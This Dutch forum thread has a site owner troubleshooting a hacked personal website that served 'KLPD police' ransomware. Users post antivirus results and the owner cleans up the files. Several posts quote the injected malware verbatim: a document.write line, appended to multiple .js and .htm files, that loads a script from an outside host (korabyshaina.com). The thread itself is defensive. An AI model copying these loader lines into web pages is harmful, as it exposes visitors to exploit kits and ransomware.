KLPD-Politie Virus via de Website

Status
Niet open voor verdere reacties.

kareljanssen

Gebruiker
Lid geworden
9 okt 2001
Berichten
228
Hoi,

heb het idee dat mijn website op één of andere manier mogelijk gehackt is zie de afb.
http://home.zonnet.nl/rsetteur//Politie_Virus_02.JPG[img]

Heb toen bewust het gedaan en ja hoor daar kwam het KLPD virus.
Hoe kan ik er achter komen dat er iets met de site gebeurd/gehackt/etc. is hoe is er achter te komen en wat aan te doen.

MVG Karel
 

Bijlagen

  • Politie_Virus_02.JPG
    Politie_Virus_02.JPG
    18,8 KB · Weergaven: 58
Laatst bewerkt:
Goede middag zo juist heb ik u website bezocht en mijn antivirus (avast) gaf de volgende melding misschien kun je er wat mee

URL: http://home.zonnet.nl/rsetteur/inhoud2.js|{gzip}
Infectie: JS:Agent-CPV [Trj]

dus een je hebt volgens mij een trojan te pakken op je site en probeer hem te zoeken en dat javascript bestandje inhoud2 te verwijderen dan denk ik het verholpen is

ik heb inhoud2.js gescant en hier zijn de resultaten
1. Kaspersky: Trojan-PSW.Win32.Fareit.ampj
2.McAfee: Artemis!063BA506C7E0
3.F-Secure: Trojan.JS.Blacole.Gen
4.Emsisoft: Trojan.JS.Blacole.Gen (B)
5.Bitdefender: BitDefender: Trojan.JS.Blacole.Gen
6Avast: JS:Agent-CPV [Trj]
7 AVG: JS/Redir
voor het uitgebreid rapport zie link KLIK
veel succes
 
Laatst bewerkt:
Hoi,

bedankt ga het nakijken

Toch wel vreemd heb al een aantal jaren niets meer aan de site gedaan nooit een melding er over gehad.
Vandaar dat ik dan ook de vraag stelde is die soms gehackt.


Maar ga het nakijken nogmaals bedankt voor het antwoordt.
Mocht ik wat vinden meld ik uiteraard.

MVG Karel
 
Hoi,

Heb een back-up gemaakt van de huidige site en deze ook laten scannen.
Deze ook met Virus Totaal laten scannen kreeg bij meerdere files ongeveer dezelfde uitkomsten.

Heb van alles vergeleken met een eerdere back-up ook die laten scannen hadden ook ongeveer dezelfde uitkomsten.
Voor het idee

backscroll.js
Sophos Mal/Iframe-AO 20131129
McAfee JS/Exploit-Blacole.ml 20131129
McAfee-GW-Edition JS/Exploit-Blacole.ml 20131129
Avast JS:Agent-CPV [Trj] 20131129
AVG JS/Redir 20131128
DrWeb JS.IFrame.533 20131129

xaramenu.js
Ad-Aware Trojan.JS.Blacole.Gen 20131129
Avast JS:Agent-CPV [Trj] 20131129
AVG JS/Redir 20131128
BitDefender Trojan.JS.Blacole.Gen 20131129
DrWeb JS.IFrame.533 20131129
Emsisoft Trojan.JS.Blacole.Gen (B) 20131129
F-Secure Trojan.JS.Blacole.Gen 20131129
GData Trojan.JS.Blacole.Gen 20131129
McAfee JS/Exploit-Blacole.ml 20131129
McAfee-GW-Edition JS/Exploit-Blacole.ml 20131129
MicroWorld-eScan Trojan.JS.Blacole.Gen 20131129
nProtect Trojan.JS.Blacole.Gen 20131128
Sophos Mal/Iframe-AO 20131129

Dat er is ingebroken is vrijwel zeker de datums van een aantal files waren van een paar dagen geleden.
Daar ik er al tijden niets meer aan de site gedaan had moet dat toch door uuhh... iets gebeurd zijn.
Ook zag ik bij Sticky PassWord dat 2 dagen eerdere de datums stonden en de paswoorden niet meer geldig/onleesbaar waren.
Dit zelfde ook bij RoboForm ook daar waren de PassWords niet meer geldig/onleesbaar.

Dit vond ik een vreemde in backscroll.js

/*eefa7e*/
document.write('<script src="http://korabyshaina.com/wp-admin/CueC3RfW.php?id=28839732" type="text/javascript"></script>');
/*/eefa7e*/


En dit is er bijgekomen zegt me nog even niets lijkt me onschuldig.
<!--
function MM_reloadPage(init) { //reloads the window if Nav4 resized
if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) {
document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }}
else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload();
}
MM_reloadPage(true);
//-->

Kortom er moet na mijn idee wel wat gebeurt zijn, heb dan ook alles voorlopig verwijdert en een tijdelijk iets neergezet en een ander paswoord opgevraagd en toegepast op FTP.

Ik weet niet of er nog dingen die moeten gebeuren.

MVG Karel
 
Controleer je eigen systeem ook goed met verschillende scanners. Veel malware steelt FTP gegevens van geïnfecteerde systemen.
 
Bedankt voor de reactie

had dit al gedaan met 3 verschillende scanners en MalwareBytes

MVG Karel
 
Sorry voor de late beantwoording.

Microsoft Essentials vindt niets
Eset vindt niets
AVG vindt er 7 zijn allemaal .JS bestanden.
Deze geopend en vergeleken met een oudere back-up van die bestanden en elke keer is er onderaan van zo'n script wat bij komen te staan.

Hier wat voorbeelden wat elke onder aan in het script er is bijgekomen t.o.v. een eerdere back-up.

Bij BackScroll.js
/*eefa7e*/
document.write('<script src="http://korabyshaina.com/wp-admin/CueC3RfW.php?id=28839732" type="text/javascript"></script>');
/*/eefa7e*/

geov2.js
/*97674b*/
document.write('<script src="http://korabyshaina.com/wp-admin/CueC3RfW.php?id=28839746" type="text/javascript"></script>');
/*/97674b*/

inhoud2.js
/*b6ba93*/
document.write('<script src="http://korabyshaina.com/wp-admin/CueC3RfW.php?id=28839738" type="text/javascript"></script>');
/*/b6ba93*/

inhoud2a.js
/*c4d02d*/
document.write('<script src="http://korabyshaina.com/wp-admin/CueC3RfW.php?id=28839739" type="text/javascript"></script>');
/*/c4d02d*/

layers.js
/*4b9daa*/
document.write('<script src="http://korabyshaina.com/wp-admin/CueC3RfW.php?id=28839749" type="text/javascript"></script>');
/*/4b9daa*/

xaramenu.js
/*95954d*/
document.write('<script src="http://korabyshaina.com/wp-admin/CueC3RfW.php?id=28839742" type="text/javascript"></script>');
/*/95954d*/

Voor het idee wat er onderaan is bijgekomen ziet er steeds zo uit echter wel met iets andere vermeldingen wat ook is te zien in het zwarte.
Script_fouten_02a.jpg

Script_fouten_03a.jpg




AVG gaf deze bovenstaande meldingen.
Heb al mijn FTP en inlog/site en computer paswoord veranderd de partitie/harde schijf op virus- en malware gescand.
Wat ik nu wil doen is deze laatste bijgekomen vermeldingen uit de scripts verwijderen en dan weer eens het geheel uploaden.

Of zie ik iets over het hoofd heb er ook geen ervaring mee

MVG Karel
 
Laatst bewerkt:
Goede middag zo juist heb ik u website bezocht en mijn antivirus (avast) gaf de volgende melding misschien kun je er wat mee

URL: http://home.zonnet.nl/rsetteur/inhoud2.js|{gzip}
Infectie: JS:Agent-CPV [Trj]

dus een je hebt volgens mij een trojan te pakken op je site en probeer hem te zoeken en dat javascript bestandje inhoud2 te verwijderen dan denk ik het verholpen is voor het uitgebreid rapport zie link KLIK
veel succes

Hoi

zou je het nog een keer willen doen.
Ben met het gebeuren bezig geweest alles nagekeken en dingen verandert niet alleen in de inhoud2.js
Er waren ook in een aantal .HTM files dit soort scripts aanwezig

/*eefa7e*/
document.write('<script src="http://korabyshaina.com/wp-admin/CueC3RfW.php?id=28839732" type="text/javascript"></script>');
/*/eefa7e*/

Zelf zie ik niets meer als ik de pagina's oproep vandaar de vraag of je het nog eens wil doen.
http://home.zonnet.nl/rsetteur/


MVG Karel
 
Laatst bewerkt:
Re klpvirus

hier de Resultaten van de virusscan [URL="https://www.virustotal.com/nl/url/cf0eaf4b89a41a2d5f938c462ada7c04df0a83e4ec6d4c881049e132b0865477/analysis/1386267020/"]https://www.virustotal.com/nl/url/cf0eaf4b89a41a2d5f938c462ada7c04df0a83e4ec6d4c881049e132b0865477/analysis/1386267020/[/URL]
O te zien is alles Schoon dus zet je vraag even op opgelost

P.S ik heb zelf al 1.5 jaar ervaring met website's bouwen en beveiligen dus vandaar dat je snel een antwoord hebt gekregen van mij en nog veel succes
 
Laatst bewerkt:
Hoi,

bedankt voor de reactie en uiteraard de scan. :thumb:
Zo te zien is het weer schoon en nu maar afwachten dat het niet meer terugkomt.

Alleen jammer dat je er niet achter kan komen (althans ik niet) hoe ze dit hebben kunnen doen.
Het enige wat ik kan bedenken is dat ze via FTP wachtwoorden hebben achterhaald en zo veranderingen hebben aangebracht.

Zet de vraag als opgelost neer.
 
Laatst bewerkt:
heb je website bezocht en mijn avast en malwarebytes pro gaf niks aan dus alles inorde ;)
 
Hoi,

bedankt voor de reactie heb er ook met verschillende virusscanners het getest ook hier geen enkele reactie.
Zijn we in ieder geval er van verlost dat mensen via de site een virus oplopen.

Nogmaals ook bedankt nog.

MVG Karel
 
Status
Niet open voor verdere reacties.
Terug
Bovenaan Onderaan